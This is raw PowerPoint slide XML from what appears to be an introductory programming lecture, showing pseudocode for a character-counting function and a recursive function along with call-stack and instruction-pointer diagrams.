          <a:xfrm>
            <a:off x="8779274" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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AEAB490-5D15-4AF4-847B-A2A269CBC1C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3463365"/>
            <a:ext cx="2504140" cy="40246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“testing”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E1AEF61-2B46-4F3C-94FF-2BD8CB0AADCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2985247"/>
            <a:ext cx="2504140" cy="40246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“t”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BF1FFFF-D29F-47D9-AB0C-C55D1C748422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="4862812"/>
            <a:ext cx="2504140" cy="40246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pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="4384694"/>
            <a:ext cx="2504140" cy="40246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count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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8016603" y="2531510"/>
            <a:ext cx="621074" cy="1337779"/>
            <a:chOff x="7973090" y="2547879"/>
            <a:chExt cx="621074" cy="880579"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414871" y="2547879"/>
              <a:ext cx="179293" cy="880579"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7820334" y="2700844"/>
              <a:ext cx="7056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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8021166" y="3716702"/>
            <a:ext cx="616511" cy="1510364"/>
            <a:chOff x="7977653" y="2367393"/>
            <a:chExt cx="616511" cy="1061065"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414871" y="2547879"/>
              <a:ext cx="179293" cy="880579"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7702481" y="2642565"/>
              <a:ext cx="9504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count()</a:t>
              </a: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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="3924029"/>
            <a:ext cx="2504140" cy="40246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IP = 8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170741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96296E-6 L -0.00039 0.0532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0.05324 L -0.00039 -0.49236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29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49236 L 2.91667E-6 -0.10718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0.10695 L 0.00013 0.1125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972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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="4" animBg="1"/>
      <p:bldP spid="19" grpId="1" animBg="1"/>
      <p:bldP spid="20" grpId="1" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="1" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="1" animBg="1"/>
      <p:bldP spid="30" grpId="1" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="1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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two Call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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s, 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character</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c) {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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count;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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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…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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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count(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“testing”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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“t”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// should return 2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count(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“elevate”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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“e”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// should return 3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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874" cy="3890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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1-4: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5:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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6: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7: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8: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9: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238780" y="3816781"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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9961B74-24D7-40F6-9F89-D024A5D2804F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8016603" y="4906681"/>
            <a:ext cx="3266811" cy="1294893"/>
            <a:chOff x="8016603" y="4906681"/>
            <a:chExt cx="3266811" cy="1294893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BF1FFFF-D29F-47D9-AB0C-C55D1C748422}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="5799113"/>
              <a:ext cx="2504140" cy="40246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/>
                <a:t>pos</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="5320995"/>
              <a:ext cx="2504140" cy="40246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count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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8016603" y="4906681"/>
              <a:ext cx="570172" cy="1271522"/>
              <a:chOff x="7973090" y="2156936"/>
              <a:chExt cx="570172" cy="1271522"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Left Bracket 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8414872" y="2156937"/>
                <a:ext cx="128390" cy="1271521"/>
              </a:xfrm>
              <a:prstGeom prst="leftBracket">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="57150"/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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="7611808" y="2518218"/>
                <a:ext cx="11226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count()</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="4860330"/>
            <a:ext cx="2504140" cy="40246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IP = 8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6D269AD-0CA5-4D4D-863C-B05DAB3C6931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8016603" y="2563906"/>
            <a:ext cx="3266811" cy="2228859"/>
            <a:chOff x="8016603" y="2563906"/>
            <a:chExt cx="3266811" cy="222885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AEAB490-5D15-4AF4-847B-A2A269CBC1C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="3463365"/>
              <a:ext cx="2504140" cy="40246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“testing”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E1AEF61-2B46-4F3C-94FF-2BD8CB0AADCC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="2985247"/>
              <a:ext cx="2504140" cy="40246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“t”</a:t>
              </a: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E8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8016603" y="2563906"/>
              <a:ext cx="535726" cy="2228859"/>
              <a:chOff x="7973090" y="2340527"/>
              <a:chExt cx="535726" cy="1087931"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Left Bracket 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8414872" y="2340527"/>
                <a:ext cx="93944" cy="1087931"/>
              </a:xfrm>
              <a:prstGeom prst="leftBracket">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="57150"/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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="7899150" y="2622028"/>
                <a:ext cx="54798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main()</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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F603F92-8EA1-4499-BC0D-A3605390B6E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="4390303"/>
              <a:ext cx="2504140" cy="40246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“elevate”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44C2301-B925-4357-B889-B14976F8AE1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="3923135"/>
              <a:ext cx="2504140" cy="40246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“e”</a:t>
              </a:r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D7232182-2697-42C1-9E85-554810934078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="4860330"/>
            <a:ext cx="2504140" cy="40246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IP = 9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28310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44444E-6 L 4.375E-6 0.0595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.0595 L 4.375E-6 -0.33356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65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0.33356 L 4.375E-6 -0.10694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0.10695 L 4.375E-6 0.11135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.11135 L 4.375E-6 -0.33356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245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0.33356 L 4.375E-6 -0.10695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0.10694 L 4.375E-6 0.17014 " pathEditMode="relative" rAng="0" ptsTypes="AA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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="4" animBg="1"/>
      <p:bldP spid="16" grpId="5" animBg="1"/>
      <p:bldP spid="16" grpId="6" animBg="1"/>
      <p:bldP spid="16" grpId="7" animBg="1"/>
      <p:bldP spid="30" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="1" animBg="1"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="33" grpId="1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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recursion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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> r(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> n) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (n &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) r(n – 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> n;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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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r(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// should return 3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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9413956" y="365125"/>
            <a:ext cx="1256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Memory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E4E672-CDAA-485B-9583-9699C6DF79E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11340296" y="826790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2980C7-F5FE-4849-AB85-A7375AFA2548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11399966" y="6197293"/>
            <a:ext cx="568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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722391" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11366759" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874" cy="3890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0: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1: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2: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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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4: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5: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6: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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
